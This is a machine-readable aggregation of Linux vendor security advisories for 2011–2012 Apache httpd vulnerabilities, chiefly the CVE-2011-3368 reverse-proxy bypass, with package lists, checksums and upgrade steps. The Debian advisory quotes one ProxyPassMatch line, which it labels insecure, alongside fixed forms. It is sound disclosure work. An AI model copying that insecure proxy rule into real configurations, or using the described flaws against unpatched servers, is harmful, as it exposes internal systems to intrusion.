([CVE-2011-3348](<https://access.redhat.com/security/cve/CVE-2011-3348>))\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-devel-2.2.21-1.19.amzn1.i686 \n httpd-tools-2.2.21-1.19.amzn1.i686 \n httpd-2.2.21-1.19.amzn1.i686 \n mod_ssl-2.2.21-1.19.amzn1.i686 \n httpd-debuginfo-2.2.21-1.19.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.21-1.19.amzn1.noarch \n \n src: \n httpd-2.2.21-1.19.amzn1.src \n \n x86_64: \n mod_ssl-2.2.21-1.19.amzn1.x86_64 \n httpd-debuginfo-2.2.21-1.19.amzn1.x86_64 \n httpd-tools-2.2.21-1.19.amzn1.x86_64 \n httpd-devel-2.2.21-1.19.amzn1.x86_64 \n httpd-2.2.21-1.19.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2011-10-31T18:19:00", "published": "2011-10-31T18:19:00", "id": "ALAS-2011-009", "href": "https://alas.aws.amazon.com/ALAS-2011-9.html", "title": "Medium: httpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:26:33", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1392\n\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. In certain configurations, if a reverse\nproxy used the ProxyPassMatch directive, or if it used the RewriteRule\ndirective with the proxy flag, a remote attacker could make the proxy\nconnect to an arbitrary server, possibly disclosing sensitive information\nfrom internal web servers not directly accessible to the attacker.\n(CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this\nissue.\n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP header\nvalues. 
This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-November/030209.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-November/030210.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-October/030163.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-October/030164.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-suexec\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1392.html", "edition": 4, "modified": "2011-11-09T20:46:44", "published": "2011-10-20T21:19:56", "href": "http://lists.centos.org/pipermail/centos-announce/2011-October/030163.html", "id": "CESA-2011:1392", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:27:47", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0128\n\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request,\nor by using a specially-crafted URI. 
(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
After installing the updated\npackages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/030471.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0128.html", "edition": 3, "modified": "2012-02-14T11:13:29", "published": "2012-02-14T11:13:29", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/030471.html", "id": "CESA-2012:0128", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. In certain configurations, if a reverse\nproxy used the ProxyPassMatch directive, or if it used the RewriteRule\ndirective with the proxy flag, a remote attacker could make the proxy\nconnect to an arbitrary server, possibly disclosing sensitive information\nfrom internal web servers not directly accessible to the attacker.\n(CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this\nissue.\n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP header\nvalues. This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:05:23", "published": "2011-10-20T04:00:00", "id": "RHSA-2011:1392", "href": "https://access.redhat.com/errata/RHSA-2011:1392", "type": "redhat", "title": "(RHSA-2011:1392) Moderate: httpd security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. In certain configurations, if a reverse\nproxy used the ProxyPassMatch directive, or if it used the RewriteRule\ndirective with the proxy flag, a remote attacker could make the proxy\nconnect to an arbitrary server, possibly disclosing sensitive information\nfrom internal web servers not directly accessible to the attacker.\n(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an \"Internal\nServer Error\" response when processing certain malformed HTTP requests,\nwhich caused the back-end server to be marked as failed in configurations\nwhere mod_proxy was used in load balancer mode. A remote attacker could\ncause mod_proxy to not send requests to back-end AJP (Apache JServ\nProtocol) servers for the retry timeout period or until all back-end\nservers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting the\nCVE-2011-3368 issue.\n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP header\nvalues. This update corrects those regressions. 
(BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2018-06-06T20:24:24", "published": "2011-10-20T04:00:00", "id": "RHSA-2011:1391", "href": "https://access.redhat.com/errata/RHSA-2011:1391", "type": "redhat", "title": "(RHSA-2011:1391) Moderate: httpd security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:33", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053"], "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request.\n(CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. 
An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically.\n", "modified": "2017-09-08T12:08:34", "published": "2012-02-21T05:00:00", "id": "RHSA-2012:0323", "href": "https://access.redhat.com/errata/RHSA-2012:0323", "type": "redhat", "title": "(RHSA-2012:0323) Moderate: httpd security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2016-09-04T12:42:10", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "description": "This update fixes several security issues in the Apache\n webserver.\n\n The patch for the ByteRange remote denial of service attack\n (CVE-2011-3192) was refined and the configuration options\n used by upstream were added. Introduce new config option:\n Allow MaxRanges Number of ranges requested, if exceeded,\n the complete content is served. default: 200 0|unlimited:\n unlimited none: Range headers are ignored. 
This option is a\n backport from 2.2.21.\n\n Also fixed: CVE-2011-3348: Denial of service in proxy_ajp\n when using an undefined method.\n\n CVE-2011-3368: Exposure of internal servers via reverse\n proxy methods with mod_proxy enabled and incorrect Rewrite\n or Proxy Rules.\n\n", "edition": 1, "modified": "2011-11-04T09:08:34", "published": "2011-11-04T09:08:34", "id": "OPENSUSE-SU-2011:1217-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00009.html", "type": "suse", "title": "apache2: Fixed several security issues (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:46", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "description": "This update brings Apache to version 2.2.12.\n\n The main reason is the enablement of the Server Name\n Indication (SNI) that allows several SSL-enabled domains\n on one IP address (FATE#311973). See the\n SSLStrictSNIVHostCheck directive as documented in\n /usr/share/apache2/manual/mod/mod_ssl.html.en\n\n Also the patch for the ByteRange remote denial of service\n attack (CVE-2011-3192) was refined and the configuration\n options used by upstream were added.\n\n Introduce new config option: Allow MaxRanges Number of\n ranges requested, if exceeded, the complete content is\n served. default: 200 0|unlimited: unlimited none: Range\n headers are ignored. This option is a backport from 2.2.21.\n\n Also fixed were\n\n * CVE-2011-3348: Denial of service in proxy_ajp when\n using an undefined method.\n * CVE-2011-3368: Exposure of internal servers via\n reverse proxy methods with mod_proxy enabled and incorrect\n Rewrite or Proxy Rules.\n\n This update also includes a newer\n apache2-vhost-ssl.template, which disables SSLv2, and\n allows SSLv3 and strong ciphers only. 
Please note that\n existing vhosts will not be converted.\n", "edition": 1, "modified": "2011-11-04T09:08:25", "published": "2011-11-04T09:08:25", "id": "SUSE-SU-2011:1215-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00007.html", "title": "Security update for Apache2 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0419", "CVE-2011-3368", "CVE-2010-1623", "CVE-2011-3192", "CVE-2011-1928"], "description": "This update fixes several security issues in the Apache2\n webserver.\n\n *\n\n The severe ByteRange remote denial of service attack\n (CVE-2011-3192) was fixed, configuration options used by\n upstream were added.\n\n Introduce new config option: Allow MaxRanges Number\n of ranges requested, if exceeded, the complete content is\n served. default: 200 0|unlimited: unlimited none: Range\n headers are ignored. 
This option is a backport from 2.2.21.\n\n *\n\n CVE-2011-0419,CVE-2011-1928: Two fnmatch denial of\n service attacks were fixed that could exhaust the server's\n memory.\n\n *\n\n CVE-2010-1623: Another memory leak was fixed that\n could exhaust httpd server memory via unspecified methods.\n\n *\n\n CVE-2011-3368: This update also includes a fix\n for a mod_proxy reverse exposure via RewriteRule or\n ProxyPassMatch directives.\n", "edition": 1, "modified": "2011-11-09T19:08:34", "published": "2011-11-09T19:08:34", "id": "SUSE-SU-2011:1229-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00011.html", "title": "Security update for apache2 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:34:36", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-1176", "CVE-2011-3348"], "description": "It was discovered that the mod_proxy module in Apache did not properly \ninteract with the RewriteRule and ProxyPassMatch pattern matches \nin the configuration of a reverse proxy. This could allow remote \nattackers to contact internal webservers behind the proxy that were \nnot intended for external exposure. (CVE-2011-3368)\n\nStefano Nichele discovered that the mod_proxy_ajp module in Apache when \nused with mod_proxy_balancer in certain configurations could allow \nremote attackers to cause a denial of service via a malformed HTTP \nrequest. (CVE-2011-3348)\n\nSamuel Montosa discovered that the ITK Multi-Processing Module for \nApache did not properly handle certain configuration sections that \nspecify NiceValue but not AssignUserID, preventing Apache from dropping \nprivileges correctly. This issue only affected Ubuntu 10.04 LTS, Ubuntu \n10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\nUSN 1199-1 fixed a vulnerability in the byterange filter of Apache. 
The \nupstream patch introduced a regression in Apache when handling specific \nbyte range requests. This update fixes the issue.\n\nOriginal advisory details:\n\nA flaw was discovered in the byterange filter in Apache. A remote attacker \ncould exploit this to cause a denial of service via resource exhaustion.", "edition": 5, "modified": "2011-11-11T00:00:00", "published": "2011-11-11T00:00:00", "id": "USN-1259-1", "href": "https://ubuntu.com/security/notices/USN-1259-1", "title": "Apache vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2012-02-21T01:28:42", "published": "2012-02-21T01:28:42", "id": "FEDORA:4529E211C9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: httpd-2.2.22-1.fc16", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:12", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "description": "New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\n13.37, and -current to fix security issues. The apr-util package has also been\nupdated to the latest version.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/apr-util-1.4.1-i486-1_slack13.37.txz: Upgraded.\n Version bump for httpd upgrade.\npatches/packages/httpd-2.2.22-i486-1_slack13.37.txz: Upgraded.\n *) SECURITY: CVE-2011-3368 (cve.mitre.org)\n Reject requests where the request-URI does not match the HTTP\n specification, preventing unexpected expansion of target URLs in\n some reverse proxy configurations. 
[Joe Orton]\n *) SECURITY: CVE-2011-3607 (cve.mitre.org)\n Fix integer overflow in ap_pregsub() which, when the mod_setenvif module\n is enabled, could allow local users to gain privileges via a .htaccess\n file. [Stefan Fritsch, Greg Ames]\n *) SECURITY: CVE-2011-4317 (cve.mitre.org)\n Resolve additional cases of URL rewriting with ProxyPassMatch or\n RewriteRule, where particular request-URIs could result in undesired\n backend network exposure in some configurations.\n [Joe Orton]\n *) SECURITY: CVE-2012-0021 (cve.mitre.org)\n mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format\n string is in use and a client sends a nameless, valueless cookie, causing\n a denial of service. The issue existed since version 2.2.17. PR 52256.\n [Rainer Canavan <rainer-apache 7val com>]\n *) SECURITY: CVE-2012-0031 (cve.mitre.org)\n Fix scoreboard issue which could allow an unprivileged child process\n could cause the parent to crash at shutdown rather than terminate\n cleanly. [Joe Orton]\n *) SECURITY: CVE-2012-0053 (cve.mitre.org)\n Fix an issue in error responses that could expose \"httpOnly\" cookies\n when no custom ErrorDocument is specified for status code 400.\n [Eric Covener]\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/apr-util-1.4.1-i486-1_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/httpd-2.2.22-i486-1_slack12.0.tgz\n\nUpdated packages for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/apr-util-1.4.1-i486-1_slack12.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/httpd-2.2.22-i486-1_slack12.1.tgz\n\nUpdated packages for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/apr-util-1.4.1-i486-1_slack12.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/httpd-2.2.22-i486-1_slack12.2.tgz\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/apr-util-1.4.1-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.22-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/apr-util-1.4.1-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.22-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/apr-util-1.4.1-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.22-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/apr-util-1.4.1-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.22-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 
13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/apr-util-1.4.1-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.22-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/apr-util-1.4.1-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.22-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-util-1.4.1-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.2.22-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-util-1.4.1-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.2.22-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 packages:\n3143affee7e89d16a2f5b4f58f1f2c9d apr-util-1.4.1-i486-1_slack12.0.tgz\n86c2b71a544c9533794951f718bd907b httpd-2.2.22-i486-1_slack12.0.tgz\n\nSlackware 12.1 packages:\naab31157fa672bb2bc11851b486c9d5c apr-util-1.4.1-i486-1_slack12.1.tgz\n1362ef9a9b2d355e1cf9b5c7e0ae0607 httpd-2.2.22-i486-1_slack12.1.tgz\n\nSlackware 12.2 packages:\nf30f1f0a949f321b6aefb99a703eca3f apr-util-1.4.1-i486-1_slack12.2.tgz\n18fd6ddd6e6bbf4a7222ade821ec1aa1 httpd-2.2.22-i486-1_slack12.2.tgz\n\nSlackware 13.0 packages:\nd3600fef7f1cabb62554417567fb55ab apr-util-1.4.1-i486-1_slack13.0.txz\n0456c808efb92da333942ff939746d77 httpd-2.2.22-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nd15c2e0a4aa074bbadfa50099da482b2 apr-util-1.4.1-x86_64-1_slack13.0.txz\n1b72685b2519bbf167973d88dce562e1 httpd-2.2.22-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n9c7c2bb99c99f3a6275f0dc9636ce38c apr-util-1.4.1-i486-1_slack13.1.txz\n49a5e4a73be2328d80cca186efe2f6f7 
httpd-2.2.22-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n4f9dcb6495c04d3094cc68050440505b apr-util-1.4.1-x86_64-1_slack13.1.txz\n1f378f8a4d990d7298e0155b22cfcf19 httpd-2.2.22-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n7feb382700511d72737c5a31e91ee56e apr-util-1.4.1-i486-1_slack13.37.txz\n783de593b5827c8601e2b486cf98397f httpd-2.2.22-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n1bd4b3df67a0449f3015e82e47cd808d apr-util-1.4.1-x86_64-1_slack13.37.txz\n8999903e736cbb29c055ea2bf66cfed1 httpd-2.2.22-x86_64-1_slack13.37.txz\n\nSlackware -current packages:\ne709c8056cede91c35fd354ad5b654df l/apr-util-1.4.1-i486-1.txz\n97c295a42d4678537c62d6ce54d3e1fa n/httpd-2.2.22-i486-1.txz\n\nSlackware x86_64 -current packages:\n55fdf36b05ff7e82aa9a015289290424 l/apr-util-1.4.1-x86_64-1.txz\n09daa138b81fbf877596e4abc2a01bb6 n/httpd-2.2.22-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg apr-util-1.4.1-i486-1_slack13.37.txz httpd-2.2.22-i486-1_slack13.37.txz\n\nThen, restart the httpd daemon.", "modified": "2012-02-10T17:43:57", "published": "2012-02-10T17:43:57", "id": "SSA-2012-041-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.792124", "type": "slackware", "title": "[slackware-security] httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-11-11T13:16:21", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2405-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nFebruary 06, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : multiple issues\nProblem type : 
remote\nDebian-specific: no\nCVE ID : CVE-2011-3607 CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 \n CVE-2012-0031 CVE-2012-0053 \n\nSeveral vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\n An integer overflow in ap_pregsub() could allow local attackers to\n execute arbitrary code at elevated privileges via crafted .htaccess\n files.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\n The Apache HTTP Server did not properly validate the request URI for\n proxied requests. In certain reverse proxy configurations using the\n ProxyPassMatch directive or using the RewriteRule directive with the\n [P] flag, a remote attacker could make the proxy connect to an\n arbitrary server. This could allow the attacker to access internal\n servers that are not otherwise accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append arbitrary\n strings to the host or port parts of the target URI. For example, the\n configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations:\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1\n ProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\nCVE-2012-0031:\n\n An apache2 child process could cause the parent process to crash\n during shutdown. This is a violation of the privilege separation\n between the apache2 processes and could potentially be used to worsen\n the impact of other vulnerabilities.\n\nCVE-2012-0053:\n\n The response message for error code 400 (bad request) could be used to\n expose \"httpOnly\" cookies. 
This could allow a remote attacker using\n cross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nThis update also contains updated apache2-mpm-itk packages which have\nbeen recompiled against the updated apache2 packages. The new version\nnumber for the oldstable distribution is 2.2.6-02-1+lenny7. In the\nstable distribution, apache2-mpm-itk has the same version number as\napache2.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2012-02-06T09:24:08", "published": "2012-02-06T09:24:08", "id": "DEBIAN:DSA-2405-1:AE657", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00031.html", "title": "[SECURITY] [DSA 2405-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}